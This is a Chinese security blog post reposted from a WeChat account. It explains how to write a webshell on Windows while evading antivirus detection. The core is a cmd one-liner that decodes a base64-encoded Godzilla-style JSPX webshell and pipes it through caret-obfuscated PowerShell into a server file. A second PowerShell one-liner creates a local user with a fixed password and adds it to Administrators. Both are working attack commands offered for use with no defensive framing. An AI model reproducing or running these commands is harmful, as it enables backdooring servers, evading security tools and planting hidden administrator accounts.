视角福利
windows下多种环境下绕过字符转义绕过某数字写webshell(哥斯拉默认)
利用场景
1.在之前的测试过程中,进行文件上传的时候,无法突破冰蝎马或者大马的查杀,无法进行webshell连接。有时候只能上传命令执行的小马,进行渗透。这之后在继续webshell连接尝试,就要进行绕过全家桶写马。
2.只能进行命令执行,尝试写webshell,被全家桶查杀时。常见的shiro的框架,可以执行命令,但是无法上传webshell。
cmd /c echo [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgdmVyc2lvbj0iMS4yIj48anNwOmRlY2xhcmF0aW9uPiBTdHJpbmcgeGM9IjNjNmUwYjhhOWMxNTIyNGEiOyBTdHJpbmcgcGFzcz0icGFzcyI7IFN0cmluZyBtZDU9bWQ1KHBhc3MreGMpOyBjbGFzcyBYIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7cHVibGljIFgoQ2xhc3NMb2FkZXIgeil7c3VwZXIoeik7fXB1YmxpYyBDbGFzcyBRKGJ5dGVbXSBjYil7cmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGNiLCAwLCBjYi5sZW5ndGgpO30gfXB1YmxpYyBieXRlW10geChieXRlW10gcyxib29sZWFuIG0peyB0cnl7amF2YXguY3J5cHRvLkNpcGhlciBjPWphdmF4LmNyeXB0by5DaXBoZXIuZ2V0SW5zdGFuY2UoIkFFUyIpO2MuaW5pdChtPzE6MixuZXcgamF2YXguY3J5cHRvLnNwZWMuU2VjcmV0S2V5U3BlYyh4Yy5nZXRCeXRlcygpLCJBRVMiKSk7cmV0dXJuIGMuZG9GaW5hbChzKTsgfWNhdGNoIChFeGNlcHRpb24gZSl7cmV0dXJuIG51bGw7IH19IHB1YmxpYyBzdGF0aWMgU3RyaW5nIG1kNShTdHJpbmcgcykge1N0cmluZyByZXQgPSBudWxsO3RyeSB7amF2YS5zZWN1cml0eS5NZXNzYWdlRGlnZXN0IG07bSA9IGphdmEuc2VjdXJpdHkuTWVzc2FnZURpZ2VzdC5nZXRJbnN0YW5jZSgiTUQ1Iik7bS51cGRhdGUocy5nZXRCeXRlcygpLCAwLCBzLmxlbmd0aCgpKTtyZXQgPSBuZXcgamF2YS5tYXRoLkJpZ0ludGVnZXIoMSwgbS5kaWdlc3QoKSkudG9TdHJpbmcoMTYpLnRvVXBwZXJDYXNlKCk7fSBjYXRjaCAoRXhjZXB0aW9uIGUpIHt9cmV0dXJuIHJldDsgfSBwdWJsaWMgc3RhdGljIFN0cmluZyBiYXNlNjRFbmNvZGUoYnl0ZVtdIGJzKSB0aHJvd3MgRXhjZXB0aW9uIHtDbGFzcyBiYXNlNjQ7U3RyaW5nIHZhbHVlID0gbnVsbDt0cnkge2Jhc2U2ND1DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7T2JqZWN0IEVuY29kZXIgPSBiYXNlNjQuZ2V0TWV0aG9kKCJnZXRFbmNvZGVyIiwgbnVsbCkuaW52b2tlKGJhc2U2NCwgbnVsbCk7dmFsdWUgPSAoU3RyaW5nKUVuY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImVuY29kZVRvU3RyaW5nIiwgbmV3IENsYXNzW10geyBieXRlW10uY2xhc3MgfSkuaW52b2tlKEVuY29kZXIsIG5ldyBPYmplY3RbXSB7IGJzIH0pO30gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7dHJ5IHsgYmFzZTY0PUNsYXNzLmZvck5hbWUoInN1bi5taXNjLkJBU0U2NEVuY29kZXIiKTsgT2JqZWN0IEVuY29kZXIgPSBiYXNlNjQubmV3SW5zdGFuY2UoKTsgdmFsdWUgPSAoU3RyaW5nKUVuY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImVuY29kZSIsIG5ldyBDbGFzc1tdIHsgYnl0ZVtdLmNsYXNzIH0pLmludm9rZShFbmNvZGVyLCBuZXcgT2JqZWN0W10geyBicyB9KTt9IGNhdGNoIChFeGNlcHRpb24gZTIpIHt9fXJldHVybiB2YWx1ZTsgfSBwdWJsaWMgc3RhdGljIGJ5dGVbXSBiYXNlNjREZWNvZGUoU3RyaW5nIGJzKSB0aHJvd3MgRXhjZXB0aW9uIHtDbGFzcyBiYXNlNjQ7Ynl0ZVtdIHZhbHVlID0gbnVsbDt0cnkge2Jhc2U2ND1DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7T2JqZWN0IGRlY29kZXIgPSBiYXNlNjQuZ2V0TWV0aG9kKCJnZXREZWNvZGVyIiwgbnVsbCkuaW52b2tlKGJhc2U2NCwgbnVsbCk7dmFsdWUgPSAoYnl0ZVtdKWRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIG5ldyBDbGFzc1tdIHsgU3RyaW5nLmNsYXNzIH0pLmludm9rZShkZWNvZGVyLCBuZXcgT2JqZWN0W10geyBicyB9KTt9IGNhdGNoIChFeGNlcHRpb24gZSkge3RyeSB7IGJhc2U2ND1DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIik7IE9iamVjdCBkZWNvZGVyID0gYmFzZTY0Lm5ld0luc3RhbmNlKCk7IHZhbHVlID0gKGJ5dGVbXSlkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBuZXcgQ2xhc3NbXSB7IFN0cmluZy5jbGFzcyB9KS5pbnZva2UoZGVjb2RlciwgbmV3IE9iamVjdFtdIHsgYnMgfSk7fSBjYXRjaCAoRXhjZXB0aW9uIGUyKSB7fX1yZXR1cm4gdmFsdWU7IH08L2pzcDpkZWNsYXJhdGlvbj48anNwOnNjcmlwdGxldD50cnl7Ynl0ZVtdIGRhdGE9YmFzZTY0RGVjb2RlKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKHBhc3MpKTtkYXRhPXgoZGF0YSwgZmFsc2UpO2lmIChzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpPT1udWxsKXtzZXNzaW9uLnNldEF0dHJpYnV0ZSgicGF5bG9hZCIsbmV3IFgodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLlEoZGF0YSkpO31lbHNle3JlcXVlc3Quc2V0QXR0cmlidXRlKCJwYXJhbWV0ZXJzIixkYXRhKTtqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSBhcnJPdXQ9bmV3IGphdmEuaW8uQnl0ZUFycmF5T3V0cHV0U3RyZWFtKCk7T2JqZWN0IGY9KChDbGFzcylzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpKS5uZXdJbnN0YW5jZSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO3Jlc3BvbnNlLmdldFdyaXRlcigpLndyaXRlKG1kNS5zdWJzdHJpbmcoMCwxNikpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShiYXNlNjRFbmNvZGUoeChhcnJPdXQudG9CeXRlQXJyYXkoKSwgdHJ1ZSkpKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShtZDUuc3Vic3RyaW5nKDE2KSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9PC9qc3A6c2NyaXB0bGV0PjwvanNwOnJvb3Q+'))| p^o^w^e^r^s^h^e^l^l - >123.jspx本地添加管理员一句话
在之前发表的文章中,发现只介绍了进行远程加载添加管理员的方式,可能过程繁琐一点。
这里可以把之前的远程加载,直接本地运行也是可以的。
echo $nt=[adsi]"WinNT://localhost";$user=$nt.create("user","ceshi");$user.setpassword("abc123456");$user.setinfo();Get-WmiObject -Class Win32_UserAccount -Filter "name = 'ceshi'";Set-WmiInstance -Argument @{PasswordExpires = 0};$group=[ADSI]"WinNT://localhost/administrators,group";$group.add("WinNT://$env:USERDOMAIN/ceshi,user") | powershell -走过,路过。不要错过。点个关注再走呗。
长按识别二维码,关注极梦C公众号哦~~
原文始发于微信公众号(极梦C):Bypass系列杂
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论